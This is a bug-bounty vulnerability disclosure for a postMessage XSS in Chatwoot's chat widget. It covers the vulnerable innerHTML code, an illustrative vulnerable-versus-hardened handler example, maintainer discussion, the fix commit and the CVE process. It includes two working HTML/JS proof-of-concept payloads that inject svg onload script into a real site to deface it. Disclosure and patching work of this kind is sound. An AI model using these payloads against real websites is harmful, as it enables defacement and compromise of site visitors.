XSS via postMessage to deface any website and account takeover in chatwoot/chatwoot

Valid

Reported on

Feb 2nd 2023


Description

Hey Chatwoot team, while looking for vulnerabilities I found a critical XSS which allows us to XSS/deface any website that uses the chat; this can be automated to attack thousands of websites.

Vulnerable Code

Inside this function https://github.com/chatwoot/chatwoot/blob/30fcb47477481772c9a447f7406af3a72be26ed1/app/javascript/sdk/bubbleHelpers.js#L16

We have this code:

export const setBubbleText = bubbleText => {
  if (isExpandedView(window.$chatwoot.type)) {
    const textNode = document.getElementById('woot-widget--expanded__text');
    textNode.innerHTML = bubbleText;
  }
};

The code uses the dangerous JS function innerHTML with the bubbleText value; the problem is that we control the value of this variable via the postMessage function.

Proof of Concept

<!-- PoC 1: the victim clicks the page, which opens the target in a new window
     and, once it has loaded, posts a setBubbleLabel event whose label carries
     markup that innerHTML turns into live DOM -->
<body onclick=x()><h1>Click here
<script>
var w;
function x(){
  // open the site that embeds the widget (window.open needs a user gesture)
  w=window.open('https://www.chatwoot.com/','w');

  // wait for the page and widget to load, then deliver the payload; the
  // targetOrigin argument is '*', so it is delivered whatever the receiving origin
  setTimeout(()=>{
    w.postMessage(`chatwoot-widget:{"event":"setBubbleLabel","label":"<svg><svg/onload='document.body.innerHTML=&quot;<br><br><h1 style=color:red;font-size:99px>pwned&quot;'>"}`,'*')
  },5000)
}
</script>

Online POC

https://pwr.wtf/chatw.html


Thanks Renwa

Impact

This bug can be used to take over accounts of websites which use Chatwoot and deface any page on their site, which leads to huge loss and reputation damage. No user interaction is required and the attack is simple: just by visiting a webpage the attacker can launch the attack and target mass victims.

Occurrences

Change innerHTML to innerText to fix this vulnerability
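The following is an added example, not code from the report or from Chatwoot: a minimal Node model of the host-page side of a widget postMessage bridge as the report describes it, with the vulnerable dispatcher beside a hardened one. The "chatwoot-widget:" envelope and the setBubbleLabel event name are taken from the PoC above; the DOM element is a stub that records which sink was written, the origins are assumed values, and the origin check in the hardened handler is an additional defence of my own on top of the innerHTML-to-text change the page proposes.

```javascript
// Added example (not Chatwoot's code): host-page handling of widget messages,
// vulnerable form next to a hardened form. Runs under Node; the DOM node is a stub.
const MESSAGE_PREFIX = 'chatwoot-widget:';

// Stand-in for the element the bubble text is written to. It records which
// sink was used so the difference between the two handlers is observable.
function makeTextNode() {
  return {
    html: null,
    text: null,
    set innerHTML(value) { this.html = value; },
    set textContent(value) { this.text = value; },
  };
}

// Parse the "chatwoot-widget:<json>" envelope; anything else is ignored.
function parseWidgetMessage(data) {
  if (typeof data !== 'string' || !data.startsWith(MESSAGE_PREFIX)) return null;
  try {
    return JSON.parse(data.slice(MESSAGE_PREFIX.length));
  } catch (e) {
    return null;
  }
}

// Vulnerable dispatcher: no origin check, and the label goes through an HTML
// sink, so any window that can reach the page can inject markup.
function vulnerableSetBubbleLabel(event, node) {
  const message = parseWidgetMessage(event.data);
  if (!message || message.event !== 'setBubbleLabel') return false;
  node.innerHTML = message.label;
  return true;
}

// Hardened dispatcher (assumed, not the project's fix). Two independent checks:
//  1. only messages from the expected origin are honoured;
//  2. the label is written as text, so markup inside it stays inert.
function hardenedSetBubbleLabel(event, node, allowedOrigin) {
  if (event.origin !== allowedOrigin) return false;
  const message = parseWidgetMessage(event.data);
  if (!message || message.event !== 'setBubbleLabel') return false;
  if (typeof message.label !== 'string') return false;
  node.textContent = message.label;
  return true;
}

// Constructed sample events: the payload shape from the report, sent from an
// attacker-controlled origin, and a benign label from the expected origin.
const WIDGET_ORIGIN = 'https://app.chatwoot.example'; // assumed deployment origin
const PAYLOAD = "<svg><svg/onload='alert(document.domain)'>";

const attackerEvent = {
  origin: 'https://attacker.example',
  data: MESSAGE_PREFIX + JSON.stringify({ event: 'setBubbleLabel', label: PAYLOAD }),
};
const legitimateEvent = {
  origin: WIDGET_ORIGIN,
  data: MESSAGE_PREFIX + JSON.stringify({ event: 'setBubbleLabel', label: 'Chat with us' }),
};

function runDemo() {
  const vulnerableNode = makeTextNode();
  const vulnerableAccepted = vulnerableSetBubbleLabel(attackerEvent, vulnerableNode);

  const hardenedNode = makeTextNode();
  const attackerAccepted = hardenedSetBubbleLabel(attackerEvent, hardenedNode, WIDGET_ORIGIN);
  const legitimateAccepted = hardenedSetBubbleLabel(legitimateEvent, hardenedNode, WIDGET_ORIGIN);

  return {
    vulnerableAccepted,              // true: attacker markup reached innerHTML
    injectedHtml: vulnerableNode.html,
    attackerAccepted,                // false: wrong origin, dropped before parsing
    legitimateAccepted,              // true
    hardenedText: hardenedNode.text, // 'Chat with us'
    hardenedHtml: hardenedNode.html, // null: the HTML sink is never used
  };
}
```

In a real page the allowed origin should be derived from the widget's configured base URL (for example from the same window.$chatwoot object the vulnerable snippet reads) rather than hard-coded, and the sender's targetOrigin of '*' in the PoC does not matter to this check: event.origin is set by the browser and cannot be spoofed by the sender.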

We are processing your report and will contact the chatwoot team within 24 hours. 10 months ago
We have contacted a member of the chatwoot team and are waiting to hear back 10 months ago
Renwa
10 months ago

Researcher


Here is another POC which doesn't require any user interaction, which makes the attack more critical: https://pwr.wtf/chatw2.html

<!-- PoC 2: no click needed; the target is loaded in a named iframe and the
     payload is posted to it after a delay -->
<body><h1>Please wait
<iframe name=win src=https://www.chatwoot.com/></iframe>
<script>
setTimeout(()=>{
  // the iframe's window is reachable as "win" through its name attribute
  win.postMessage(`chatwoot-widget:{"event":"setBubbleLabel","label":"<svg><svg/onload='alert(&quot;XSS on: &quot;+document.domain)'>"}`,'*')
},5000)
</script>
Sojan Jose modified the Severity from Critical (9.8) to Medium (5.3) 10 months ago
Sojan Jose gave praise 10 months ago
The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1
chatwoot/chatwoot maintainer has acknowledged this report 10 months ago
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
Sojan Jose validated this vulnerability 10 months ago
Renwa has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Renwa
10 months ago

Researcher


Sorry, but why is the severity Medium? This should be High, as I have provided a POC which doesn't require user interaction.

Also, these are all XSS bugs like mine with High severity reported to Chatwoot:

https://huntr.dev/bounties/1-other-chatwoot/
https://huntr.dev/bounties/e6469ba6-03a2-4b17-8b4e-8932ecd0f7ac/
https://huntr.dev/bounties/1625474692857-chatwoot/chatwoot/
https://huntr.dev/bounties/d8f5ce74-2a00-4813-b220-70af771b0edd/

Sojan Jose
10 months ago

Maintainer


@Renwa Thanks again for the report. We have started using the CVSS calculator for the reports since we will be publishing CVEs for these reports. In these cases, user interaction is required since the user must click on the malicious link.

reference: https://www.first.org/cvss/examples (example 25)

Let me know if you have questions about any of the other values.

Sojan Jose
10 months ago

Maintainer


Note: a fix has been merged to develop via https://github.com/chatwoot/chatwoot/commit/a06a5a574ad908b0ef2db7b47d05c3774eeb493d

This change will be available in the upcoming release, 2.14.0.

Renwa
10 months ago

Researcher


The fix looks alright. It's the same as I suggested, so I think I can get the fix bounty too.

Thanks

Sojan Jose
10 months ago

Maintainer


@Renwa, we will make sure to attribute it under your name when we mark it as fixed along with the release. Thanks for verifying.

Sojan Jose
10 months ago

Maintainer


@renwa, you will need to attach a fix to the issue for us to issue the fix bounty. Otherwise huntr is not showing me the option to attribute it to your name.

Renwa
10 months ago

Researcher


Hey Sojan, how can I do that? My GitHub username is RenwaX23. Should we contact huntr to see how it's done?

Sojan Jose
10 months ago

Maintainer


@Renwa, please give that a try. The maintainer interface is different from the researcher one, I think.

Renwa
9 months ago

Researcher


Tagging admin as I was told in support: @admin

Ben Harvie
9 months ago

Admin


Please click the "Mark as fixed" button at the bottom of the page, you can credit the fixer during this process and choose to assign a CVE.

Sojan Jose
9 months ago

Maintainer


@Ben Harvie the "Mark as fixed" option only lets me choose nobody or me (sojan-official). Is it because the fixer is populated from the GitHub commit?

Renwa
9 months ago

Researcher


@admin

Renwa
9 months ago

Researcher


@admin

Ben Harvie
9 months ago

Admin


@Sojan, yes that's correct, only the committer can be assigned the fix credibility.

Sojan Jose
9 months ago

Maintainer


Great work @renwax23 👌 Could you kindly propose/submit a fix for this vulnerability? Any help is appreciated.

Note: trying this flow out.

Renwa submitted a
9 months ago
Renwa
9 months ago

Researcher


I think I submitted the patch; maybe this time it shows me inside the patch bounty selection.

Sojan Jose marked this as fixed in 2.14.0 with commit a06a5a 9 months ago
Renwa has been awarded the fix bounty
This vulnerability has been assigned a CVE
This vulnerability is scheduled to go public on Apr 17th 2023
bubbleHelpers.js#L19 has been validated
Sojan Jose published this vulnerability 7 months ago